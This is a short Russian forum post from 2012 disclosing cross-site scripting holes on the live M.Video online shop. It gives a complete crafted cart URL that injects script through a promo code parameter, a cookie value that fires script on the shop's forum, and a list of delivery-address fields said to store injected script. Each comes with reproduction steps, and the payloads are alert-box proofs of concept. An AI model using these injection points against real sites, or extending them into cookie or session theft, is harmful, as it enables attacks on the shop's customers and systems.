05.02.2012, 18:21
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
М.Видео – бытовая техника и электроника по доступным ценам. Удобный интернет-магазин.
тИЦ - 2200
Добавляем уязвимый код:
Код:
http://www.mvideo.ru/homeshop/?p=cart&step=0&_recount=0&droppayment=1&delivery_type_20024096=1&ids%5B20024096%5D=1&cert_cb%5B20024096%5D=0&city_zones_id=0&promo_code_value=">alert('xss')&promo_code=1
Переходим сюда:
Код:
http://www.mvideo.ru/homeshop/?p=cart
+ XSS из-за недостаточной фильтрации в Cookie
Уязвимое место:
Код:
phorum_name:">alert('xss');
Переходим в любую тему на форуме М.Видео и XSS выполняется.
Скриншот:
+ Еще одна активка
1) Регистрируемся в системе
2) Заходим в свой профиль
3) Добавляем адрес доставки
Уязвимые поля: Корпус (cтроение), Подъезд, Телефон 2, Факс
Уязвимый код:
Скриншот:
 |
|
|